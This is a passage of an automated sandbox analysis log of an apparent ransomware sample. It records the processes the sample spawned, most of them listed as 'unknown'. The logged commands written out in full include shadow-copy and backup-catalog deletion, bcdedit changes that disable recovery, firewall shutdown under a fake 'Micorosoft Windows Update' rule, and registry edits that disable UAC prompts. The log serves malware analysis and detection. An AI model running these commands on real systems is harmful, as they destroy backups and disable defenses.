                      Source: WMIC.exe, 00000003.00000002.237288804.000001A65A1C0000.00000002.00000001.sdmp, bcdedit.exe, 00000007.00000002.242958078.000002802FE50000.00000002.00000001.sdmp, bcdedit.exe, 00000008.00000002.244504468.000001EA6AD70000.00000002.00000001.sdmp, bcdedit.exe, 00000009.00000002.246002891.0000021E1A4F0000.00000002.00000001.sdmp, bcdedit.exe, 0000000A.00000002.247775415.0000014B2FDD0000.00000002.00000001.sdmp, bcdedit.exe, 0000000C.00000002.249593598.000002394C300000.00000002.00000001.sdmp, WMIC.exe, 0000000E.00000002.255443468.000001B620480000.00000002.00000001.sdmp, WMIC.exe, 00000018.00000002.273124159.00000196AAED0000.00000002.00000001.sdmp, bcdedit.exe, 0000001D.00000002.278767439.000002A082370000.00000002.00000001.sdmp, bcdedit.exe, 0000001E.00000002.280690168.0000023F88970000.00000002.00000001.sdmp, bcdedit.exe, 00000020.00000002.283380643.000001809D2A0000.00000002.00000001.sdmp, reg.exe, 00000023.00000002.284369028.0000020E66630000.00000002.00000001.sdmp, bcdedit.exe, 00000024.00000002.285789419.00000267125F0000.00000002.00000001.sdmp, reg.exe, 00000026.00000002.287715528.00000262F21D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: vds.exe, 0000001B.00000002.504245917.0000024E66485000.00000004.00000020.sdmpBinary or memory string: 0ce-806e6f6e6963}#0000000025700000#{7f108a28-9833-4b3b-b780-2c6b5fa5c062}\?\storage#volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6b
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_0040AD76 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040AD76
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_00409F50 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,0_2_00409F50
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_00409F70 SetUnhandledExceptionFilter,0_2_00409F70
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootems noJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get caption Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /I /C:'10'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -EmbeddingJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -EmbeddingJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
